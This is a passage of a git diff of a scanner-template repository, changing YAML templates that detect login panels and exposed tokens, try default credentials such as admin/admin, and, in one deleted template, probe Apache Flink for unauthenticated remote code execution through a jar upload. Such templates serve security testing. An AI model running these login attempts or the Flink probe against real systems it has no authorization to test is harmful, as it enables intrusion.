CWE-200 requests: - method: GET @@ -26,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/ametys-admin-login-300.yaml b/poc/auth/ametys-admin-login-300.yaml index 7a96ee1ada..532dd02cda 100644 --- a/poc/auth/ametys-admin-login-300.yaml +++ b/poc/auth/ametys-admin-login-300.yaml @@ -1,16 +1,10 @@ id: ametys-admin-login info: - name: Ametys Admin Login Panel + name: Ametys Admin Login author: pathtaga severity: info - description: An Ametys admin login panel was discovered. tags: panel,ametys,cms - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 requests: - method: GET @@ -34,6 +28,4 @@ requests: part: body group: 1 regex: - - ' ([0-9.]+)' - -# Enhanced by mp on 2022/03/16 + - ' ([0-9.]+)' \ No newline at end of file diff --git a/poc/auth/ametys-admin-login-301.yaml b/poc/auth/ametys-admin-login-301.yaml deleted file mode 100644 index 532dd02cda..0000000000 --- a/poc/auth/ametys-admin-login-301.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: ametys-admin-login - -info: - name: Ametys Admin Login - author: pathtaga - severity: info - tags: panel,ametys,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/_admin/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'Ametys - Log in' - - '' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - ' ([0-9.]+)' \ No newline at end of file diff --git a/poc/auth/ametys-admin-login-302.yaml b/poc/auth/ametys-admin-login-302.yaml new file mode 100644 index 0000000000..7f33273288 --- /dev/null +++ b/poc/auth/ametys-admin-login-302.yaml @@ -0,0 +1,36 @@ +id: ametys-admin-login + +info: + name: Ametys Admin Login Panel + author: pathtaga + severity: info + description: An Ametys admin login panel was discovered. + classification: + cwe-id: CWE-200 + tags: panel,ametys,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/_admin/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ametys - Log in' + - '' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/apache-flink-unauth-rce-355.yaml b/poc/auth/apache-flink-unauth-rce-355.yaml deleted file mode 100644 index dbae4dd542..0000000000 --- a/poc/auth/apache-flink-unauth-rce-355.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: apache-flink-unauth-rce - -info: - name: Apache Flink - Remote Code Execution - author: pikpikcu - severity: critical - description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cwe-id: CWE-77 - metadata: - max-request: 1 - tags: apache,flink,rce,intrusive,unauth - -http: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="poc.jar" - Content-Type:application/octet-stream - - {{randstr}} - --8ce4b16b22b58894aa86c421e8759df3-- - - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - - type: word - words: - - "success" - - "_poc.jar" - part: body - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100c23141a6f16f90c8fab66fa3b2c0a15f1a1e8764af83f977671389376049f79a02206e4a7c6f9fc1b8828421abed2d16188c020d5eb6277cfa5835a8d60a1314d352:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apache-storm-unauth.yaml b/poc/auth/apache-storm-unauth.yaml index dc48849fe9..2a2c45e566 100644 --- a/poc/auth/apache-storm-unauth.yaml +++ b/poc/auth/apache-storm-unauth.yaml @@ -1,20 +1,14 @@ id: apache-storm-unauth - info: name: Apache Storm Unauth author: pikpikcu severity: medium - reference: - - https://storm.apache.org/releases/current/STORM-UI-REST-API.html - metadata: - max-request: 1 + reference: https://storm.apache.org/releases/current/STORM-UI-REST-API.html tags: apache,unauth,misconfig - -http: +requests: - method: GET path: - '{{BaseURL}}/api/v1/cluster/summary' - matchers-condition: and matchers: - type: word @@ -23,9 +17,6 @@ http: - '"totalMem":' - '"stormVersion":' condition: and - - type: status status: - 200 - -# digest: 490a0046304402206445294e1d237514858065f44d0ca332874876a4071b4163c436a74f803abb6c022066822b6f0d9f4fa25b39da6bec4db4aef6067a7a6d78391697a8022dc4131691:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apc-ups-login.yaml b/poc/auth/apc-ups-login.yaml deleted file mode 100644 index f28e384f2c..0000000000 --- a/poc/auth/apc-ups-login.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: apc-ups-login - -info: - name: APC UPS Login - author: droberson - severity: info - reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 - tags: iot,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/logon.htm" - - matchers-condition: and - matchers: - - type: word - words: - - 'APC | Log On' - part: body - - - type: status - status: - - 200 diff --git a/poc/auth/api-fortitoken-cloud.yaml b/poc/auth/api-fortitoken-cloud.yaml index 3a49a9a760..2e71549626 100644 --- a/poc/auth/api-fortitoken-cloud.yaml +++ b/poc/auth/api-fortitoken-cloud.yaml @@ -3,15 +3,20 @@ id: api-fortitoken-cloud info: name: FortiToken Cloud API Test author: dwisiswant0 - reference: https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview severity: info + reference: + - https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview + metadata: + max-request: 1 tags: token-spray,fortinet self-contained: true -requests: + +http: - method: GET path: - "https://ftc.fortinet.com:9696/api/v1/user" + headers: Authorization: Bearer {{token}} @@ -26,3 +31,5 @@ requests: regex: - "error_(code|message|name)" negative: true + +# digest: 4b0a0048304602210085dec939ca5aa4774aa6f9061c9f5dd131840d9c20832e13ca23afa1257873f2022100b6641576a1409c2d37274fd46d42e9c46ff5e2e13486e63eddd92c1a1e5dba1d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/api-mojoauth-466.yaml b/poc/auth/api-mojoauth-466.yaml deleted file mode 100644 index 85c9820f23..0000000000 --- a/poc/auth/api-mojoauth-466.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-mojoauth - -info: - name: MojoAuth API Test - author: daffainfo - severity: info - description: Secure and modern passwordless authentication platform - reference: - - https://mojoauth.com/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth - metadata: - max-request: 1 - tags: token-spray,mojoauth - -self-contained: true - -http: - - raw: - - | - POST https://api.mojoauth.com/token/jwks HTTP/1.1 - Host: api.mojoauth.com - X-API-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"keys"' - - '"kty"' - - '"kid"' - condition: and - -# digest: 4a0a0047304502200506d39f1578c027a21bc88f89e4c08aeb679ca01db946d0b2bfb56e7d8c615d022100b6123ee1887fe67d62e526c14ad9b4bd755d1727085a16877bbb8b59651f33ba:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/api-mojoauth.yaml b/poc/auth/api-mojoauth.yaml new file mode 100644 index 0000000000..db56c9a9bc --- /dev/null +++ b/poc/auth/api-mojoauth.yaml @@ -0,0 +1,28 @@ +id: api-mojoauth + +info: + name: MojoAuth API Test + author: daffainfo + severity: info + description: Secure and modern passwordless authentication platform + reference: + - https://mojoauth.com/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth + tags: token-spray,mojoauth + +self-contained: true +requests: + - raw: + - | + POST https://api.mojoauth.com/token/jwks HTTP/1.1 + Host: api.mojoauth.com + X-API-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"keys"' + - '"kty"' + - '"kid"' + condition: and diff --git a/poc/auth/apisix-default-login-492.yaml b/poc/auth/apisix-default-login-492.yaml index cb4e83e6df..c16b0c60b1 100644 --- a/poc/auth/apisix-default-login-492.yaml +++ b/poc/auth/apisix-default-login-492.yaml @@ -1,22 +1,13 @@ id: apisix-default-login - info: - name: Apache Apisix Default Admin Login + name: Apache Apisix Default Login author: pdteam - severity: high - description: An Apache Apisix default admin login was discovered. + severity: critical + tags: apisix,apache,default-login metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org - reference: - - https://apisix.apache.org/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: apisix,apache,default-login - requests: - raw: - | @@ -27,25 +18,20 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - admin - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - '"data"' - '"token"' - '"code":0' condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/apollo-default-login-520.yaml b/poc/auth/apollo-default-login-520.yaml index 03709bd616..f671e7631e 100644 --- a/poc/auth/apollo-default-login-520.yaml +++ b/poc/auth/apollo-default-login-520.yaml @@ -5,18 +5,17 @@ info: author: PaperPen severity: high description: An Apollo default login was discovered. + metadata: + shodan-query: http.favicon.hash:11794165 reference: - https://github.com/apolloconfig/apollo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 2 - shodan-query: http.favicon.hash:11794165 tags: apollo,default-login -http: +requests: - raw: - | POST /signin HTTP/1.1 @@ -26,6 +25,7 @@ http: Referer: {{BaseURL}}/signin? username={{user}}&password={{pass}}&login-submit=Login + - | GET /user HTTP/1.1 Host: {{Hostname}} @@ -37,6 +37,8 @@ http: pass: - admin + cookie-reuse: true + req-condition: true matchers-condition: and matchers: - type: word @@ -49,7 +51,7 @@ http: - type: dsl dsl: - "status_code_1 == 302 && status_code_2 == 200" - - "contains(tolower(header_2), 'application/json')" + - "contains(tolower(all_headers_2), 'application/json')" condition: and -# digest: 4a0a004730450220546faaa98906288873457aaf445639368f32ddc0a459ae0362b9c87333a0832d022100a718e9fdccaa633152c35bd8f59d89e60a8a24f359521d6c6b0232fe8a07e196:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/apollo-default-login-521.yaml b/poc/auth/apollo-default-login.yaml similarity index 100% rename from poc/auth/apollo-default-login-521.yaml rename to poc/auth/apollo-default-login.yaml diff --git a/poc/auth/apple-app-site-association-524.yaml b/poc/auth/apple-app-site-association-524.yaml index 53fd428289..9954c8d681 100644 --- a/poc/auth/apple-app-site-association-524.yaml +++ b/poc/auth/apple-app-site-association-524.yaml @@ -4,7 +4,7 @@ info: name: Apple app site association for harvesting end points author: panch0r3d severity: info - tags: misc,apple + tags: misc requests: - method: GET @@ -17,17 +17,17 @@ requests: matchers-condition: and matchers: - type: word - part: body words: - 'applinks' - 'appID' - 'paths' + part: body condition: and - type: word - part: header words: - 'application/json' + part: header - type: status status: diff --git a/poc/auth/argocd-login-534.yaml b/poc/auth/argocd-login-534.yaml deleted file mode 100644 index 08c875c528..0000000000 --- a/poc/auth/argocd-login-534.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: argocd-detect - -info: - name: Argo CD Login Panel - author: Adam Crosser,daffainfo - severity: info - description: An Argo CD login panel was discovered. - reference: - - https://argoproj.github.io/cd/ - metadata: - shodan-query: http.title:"Argo CD" - tags: panel,argocd,login,kubernetes - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Argo CD' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/argocd-login.yaml b/poc/auth/argocd-login-536.yaml similarity index 100% rename from poc/auth/argocd-login.yaml rename to poc/auth/argocd-login-536.yaml diff --git a/poc/auth/arl-default-login-537.yaml b/poc/auth/arl-default-login-537.yaml deleted file mode 100644 index bbadfab474..0000000000 --- a/poc/auth/arl-default-login-537.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: arl-default-login - -info: - name: ARL Default Admin Login - author: pikpikcu - description: An ARL default admin login was discovered. - severity: high - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: arl,default-login - -requests: - - raw: - - | - POST /api/user/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json; charset=UTF-8 - - {"username":"{{username}}","password":"{{password}}"} - - payloads: - username: - - admin - password: - - arlpass - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - condition: and - words: - - '"message": "success"' - - '"username": "admin"' - - '"type": "login"' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/arl-default-login-539.yaml b/poc/auth/arl-default-login-539.yaml index ade9a66625..f5dcf2d27b 100644 --- a/poc/auth/arl-default-login-539.yaml +++ b/poc/auth/arl-default-login-539.yaml @@ -9,11 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 1 tags: arl,default-login -http: +requests: - raw: - | POST /api/user/login HTTP/1.1 @@ -31,6 +29,7 @@ http: matchers-condition: and matchers: + - type: word condition: and words: @@ -42,4 +41,4 @@ http: status: - 200 -# digest: 4b0a004830460221009e8ced2d45fa685ac85035c2df9d7b215cc33338c70461e061867c7523076a8202210099449ca19939bfbf2aab4959eb1a0e46cc404198adc98cc89c469d274794e0d6:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/arl-default-login-540.yaml b/poc/auth/arl-default-login-540.yaml index a7c16e40a9..bbadfab474 100644 --- a/poc/auth/arl-default-login-540.yaml +++ b/poc/auth/arl-default-login-540.yaml @@ -1,9 +1,14 @@ id: arl-default-login info: - name: ARL Default Login + name: ARL Default Admin Login author: pikpikcu + description: An ARL default admin login was discovered. severity: high + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: arl,default-login requests: @@ -35,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/arl-default-password.yaml b/poc/auth/arl-default-password.yaml index d1be4b04a1..08f426e7da 100644 --- a/poc/auth/arl-default-password.yaml +++ b/poc/auth/arl-default-password.yaml @@ -1,9 +1,11 @@ id: arl-default-password + info: name: ARL Default Password author: pikpikcu severity: high tags: arl,default-login + requests: - method: POST path: @@ -12,8 +14,10 @@ requests: Content-Type: application/json; charset=UTF-8 body: | {"username":"admin","password":"arlpass"} + matchers-condition: and matchers: + - type: word words: - '"message": "success"' diff --git a/poc/auth/atvise-login.yaml b/poc/auth/atvise-login.yaml deleted file mode 100644 index ebc1df47af..0000000000 --- a/poc/auth/atvise-login.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: atvise-login - -info: - name: Atvise Login panel - author: idealphase - severity: info - description: atvise is leading visualization and control center solutions based on pure web technology - reference: - - https://www.exploit-db.com/ghdb/7837 - - https://www.atvise.com/en - metadata: - google-dork: intitle:"atvise - next generation" - tags: panel,atvise - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'atvise - next generation' - - - type: status - status: - - 200 diff --git a/poc/auth/authelia-panel.yaml b/poc/auth/authelia-panel.yaml new file mode 100644 index 0000000000..2ca8657997 --- /dev/null +++ b/poc/auth/authelia-panel.yaml @@ -0,0 +1,33 @@ +id: authelia-panel + +info: + name: Authelia Panel - Detect + author: rxerium + severity: info + description: | + Authelia is an open-source authentication and authorisation service providing two-factor authentication and single sign-on (SSO) for applications via a web portal. + reference: + - https://github.com/authelia/authelia + - https://www.authelia.com/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"Login - Authelia" + tags: login,panel,authelia + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Login - Authelia" + + - type: status + status: + - 200 + +# digest: 490a004630440220490a5021967e030ff89ae16d4641c71e7eed70d1dd4ff6cd0f0194c789109b09022059bfbb46ae3a213be944bd8038a53d6fc66cd14351190788fbc8a035e9e6fbed:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/avatier-password-management-605.yaml b/poc/auth/avatier-password-management-605.yaml deleted file mode 100644 index 49cd4c37ae..0000000000 --- a/poc/auth/avatier-password-management-605.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: avatier-password-management - -info: - name: Avatier Password Management Panel - author: praetorian-thendrickson,iamthefrogy,dhiyaneshDK - severity: info - description: An Avatier password management panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6576 - - https://www.avatier.com/products/identity-management/password-management/ - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.favicon.hash:983734701 - tags: panel,avatier,aims - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/' - - redirects: true - max-redirects: 2 - matchers-condition: or - matchers: - - type: word - words: - - 'LabelWelcomeToPS' - - 'Avatier Corporation' - - 'Welcome to Password Management' - condition: or - - - type: word - words: - - 'Password Management Client' - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/avatier-password-management.yaml b/poc/auth/avatier_password_management.yaml similarity index 100% rename from poc/auth/avatier-password-management.yaml rename to poc/auth/avatier_password_management.yaml diff --git a/poc/auth/aws-access-key-value-624.yaml b/poc/auth/aws-access-key-value-624.yaml new file mode 100644 index 0000000000..5cb8846e08 --- /dev/null +++ b/poc/auth/aws-access-key-value-624.yaml @@ -0,0 +1,22 @@ +id: aws-access-key-value + +info: + name: AWS Access Key ID Value + author: Swissky + severity: info + metadata: + max-request: 1 + tags: exposure,token,aws,amazon + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b" + +# digest: 4a0a004730450220593a92026bc21a26687f6e78f52259873c5643010bf2bf67aec0ad4e469ce40a022100bb56301e5df9b095b39838c76cc5cf37b469e84c9e488be380aa9f1dbfc3df00:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/aws-opensearch-login-649.yaml b/poc/auth/aws-opensearch-login-649.yaml new file mode 100644 index 0000000000..ffd32b7e76 --- /dev/null +++ b/poc/auth/aws-opensearch-login-649.yaml @@ -0,0 +1,24 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/auth/aws-opensearch-login-650.yaml b/poc/auth/aws-opensearch-login-650.yaml deleted file mode 100644 index 14f111d73a..0000000000 --- a/poc/auth/aws-opensearch-login-650.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-opensearch-login - -info: - name: AWS OpenSearch Default Login - author: Higor Melgaço (eremit4) - severity: medium - description: Searches for the AWS OpenSearch login page - reference: - - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ - tags: panel,opensearch,aws - -requests: - - method: GET - path: - - '{{BaseURL}}/_dashboards/app/login' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/auth/aws-opensearch-login.yaml b/poc/auth/aws-opensearch-login.yaml index ffd32b7e76..14f111d73a 100644 --- a/poc/auth/aws-opensearch-login.yaml +++ b/poc/auth/aws-opensearch-login.yaml @@ -5,7 +5,8 @@ info: author: Higor Melgaço (eremit4) severity: medium description: Searches for the AWS OpenSearch login page - reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ tags: panel,opensearch,aws requests: diff --git a/poc/auth/axiom-digitalocean-key-exposure-666.yaml b/poc/auth/axiom-digitalocean-key-exposure-666.yaml index 2f41c1bfe2..589c0b408e 100644 --- a/poc/auth/axiom-digitalocean-key-exposure-666.yaml +++ b/poc/auth/axiom-digitalocean-key-exposure-666.yaml @@ -5,18 +5,16 @@ info: author: geeknik severity: critical description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments. - remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom reference: - https://github.com/pry0cc/axiom classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-425 - metadata: - max-request: 1 + remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom tags: axiom,digitalocean,key,exposure -http: +requests: - method: GET path: - "{{BaseURL}}/.axiom/accounts/do.json" @@ -40,4 +38,4 @@ http: regex: - '\"do_key\"\: .*' -# digest: 4a0a00473045022100a9e645db4ccad4bb4a2c55f77872fdef290db609004656d1d6a80c3c8681177e0220328845b85d9651ac0671ab1698e5c1b458c00f1b198e6b727ac209b93ef64c0c:922c64590222798bb761d5b6d8e72950 +# Enhanced by cs on 2022/02/28 diff --git a/poc/auth/axiom-digitalocean-key-exposure-667.yaml b/poc/auth/axiom-digitalocean-key-exposure.yaml similarity index 100% rename from poc/auth/axiom-digitalocean-key-exposure-667.yaml rename to poc/auth/axiom-digitalocean-key-exposure.yaml diff --git a/poc/auth/azkaban-default-login-674.yaml b/poc/auth/azkaban-default-login-674.yaml index 18210bfaf1..be127dd034 100644 --- a/poc/auth/azkaban-default-login-674.yaml +++ b/poc/auth/azkaban-default-login-674.yaml @@ -8,11 +8,10 @@ info: classification: cwe-id: CWE-798 metadata: - max-request: 1 shodan-query: http.title:"Azkaban Web Client" tags: default-login,azkaban -http: +requests: - raw: - | POST / HTTP/1.1 @@ -27,7 +26,6 @@ http: password: - admin attack: pitchfork - matchers-condition: and matchers: - type: word @@ -52,4 +50,4 @@ http: kval: - azkaban.browser.session.id -# digest: 490a004630440220213e5751c50d6c103e6c07db12c85cc18aba0409a4f37db922316c0382c967b102202a925a305683b2216035c26b665720e900e8202b24feddc84a70e90bcb25e809:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/azkaban-default-login-673.yaml b/poc/auth/azkaban-default-login.yaml similarity index 100% rename from poc/auth/azkaban-default-login-673.yaml rename to poc/auth/azkaban-default-login.yaml diff --git a/poc/auth/basic-auth-detection-687.yaml b/poc/auth/basic-auth-detection-689.yaml similarity index 100% rename from poc/auth/basic-auth-detection-687.yaml rename to poc/auth/basic-auth-detection-689.yaml diff --git a/poc/auth/bazarr-login-702.yaml b/poc/auth/bazarr-login-702.yaml new file mode 100644 index 0000000000..2b2e898677 --- /dev/null +++ b/poc/auth/bazarr-login-702.yaml @@ -0,0 +1,19 @@ +id: bazarr-login-detect + +info: + name: Bazarr Login Detect + author: r3dg33k + severity: info + reference: + - https://www.bazarr.media/ + tags: panel,bazarr,login + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers: + - type: word + words: + - 'Bazarr' \ No newline at end of file diff --git a/poc/auth/beyondtrust-login-server.yaml b/poc/auth/beyondtrust-login-server.yaml index b2bb002482..fb449479a2 100644 --- a/poc/auth/beyondtrust-login-server.yaml +++ b/poc/auth/beyondtrust-login-server.yaml @@ -1,31 +1,42 @@ -id: beyondtrust-login-server - -info: - name: BeyondTrust PAM login Server - author: r3dg33k,nuk3s3c - severity: info - tags: beyondtrust,pam,panel - -requests: - - method: GET - path: - - '{{BaseURL}}/WebConsole/api/security/auth/loginServers' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - '"DomainName":"(.*)"' - - '"domains":' - condition: and - - extractors: - - type: json - part: body - json: - - ".domains[] | .DomainName" - - ".domains[] | .ldapservers" \ No newline at end of file +id: beyondtrust-login-server + +info: + name: BeyondTrust Privileged Access Management Login - Detect + author: r3dg33k,nuk3s3c + severity: info + description: BeyondTrust Privileged Access Management login panel was detected. + reference: + - https://www.beyondtrust.com/brand + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: beyondtrust,pam,panel + +http: + - method: GET + path: + - '{{BaseURL}}/WebConsole/api/security/auth/loginServers' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - '"DomainName":"(.*)"' + - '"domains":' + condition: and + + extractors: + - type: json + part: body + json: + - ".domains[] | .DomainName" + - ".domains[] | .ldapservers" + +# digest: 4a0a00473045022100b2c3e6ac6b56555ebac3c5334096275e7e70982c4500b136c0e89fb2b421378d02201aca2353da6e9d6d15c681b3ebf72a4a4c7e3ba3be4774297814c1aa078e412d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/bigbluebutton-login-726.yaml b/poc/auth/bigbluebutton-login-724.yaml similarity index 100% rename from poc/auth/bigbluebutton-login-726.yaml rename to poc/auth/bigbluebutton-login-724.yaml diff --git a/poc/auth/blue-iris-login-751.yaml b/poc/auth/blue-iris-login-751.yaml deleted file mode 100644 index 4a1e4acd08..0000000000 --- a/poc/auth/blue-iris-login-751.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: blue-iris-login - -info: - name: Blue Iris Login - author: dhiyaneshDK - severity: info - description: A Blue Iris login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6814 - - https://blueirissoftware.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - tags: panel,blue-iris - -requests: - - method: GET - path: - - '{{BaseURL}}/login.htm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Blue Iris Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/blue-iris-login-753.yaml b/poc/auth/blue-iris-login-753.yaml index 783f3c0527..4a1e4acd08 100644 --- a/poc/auth/blue-iris-login-753.yaml +++ b/poc/auth/blue-iris-login-753.yaml @@ -2,17 +2,17 @@ id: blue-iris-login info: name: Blue Iris Login - author: dhiyaneshDK,idealphase + author: dhiyaneshDK severity: info description: A Blue Iris login panel was detected. reference: - https://www.exploit-db.com/ghdb/6814 - https://blueirissoftware.com/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Blue Iris Login" - tags: panel,blueiris + tags: panel,blue-iris requests: - method: GET @@ -24,13 +24,8 @@ requests: - type: word words: - 'Blue Iris Login' - - type: status status: - 200 - extractors: - - type: regex - group: 1 - regex: - - 'var bi_version = "(.*)";' +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/blue-iris-login-754.yaml b/poc/auth/blue-iris-login-754.yaml new file mode 100644 index 0000000000..224b1d1b46 --- /dev/null +++ b/poc/auth/blue-iris-login-754.yaml @@ -0,0 +1,22 @@ +id: blue-iris-login + +info: + name: Blue Iris Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6814 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Blue Iris Login' + - type: status + status: + - 200 diff --git a/poc/auth/braintree-access-token-773.yaml b/poc/auth/braintree-access-token-773.yaml index cc50596326..fc4e695c66 100644 --- a/poc/auth/braintree-access-token-773.yaml +++ b/poc/auth/braintree-access-token-773.yaml @@ -4,7 +4,7 @@ info: name: PayPal Braintree Access Token Disclosure author: Ice3man severity: info - tags: exposure,token,paypal + tags: exposure,token requests: - method: GET @@ -14,4 +14,4 @@ requests: - type: regex part: body regex: - - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' + - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' \ No newline at end of file diff --git a/poc/auth/braintree-access-token.yaml b/poc/auth/braintree-access-token.yaml deleted file mode 100644 index fc4e695c66..0000000000 --- a/poc/auth/braintree-access-token.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: braintree-access-token - -info: - name: PayPal Braintree Access Token Disclosure - author: Ice3man - severity: info - tags: exposure,token - -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' \ No newline at end of file diff --git a/poc/auth/branch-key-774.yaml b/poc/auth/branch-key-774.yaml index 1b63de346f..877dd31a45 100644 --- a/poc/auth/branch-key-774.yaml +++ b/poc/auth/branch-key-774.yaml @@ -4,7 +4,8 @@ info: name: Branch.io Live Key author: 0xh7ml severity: info - reference: https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 + reference: + - 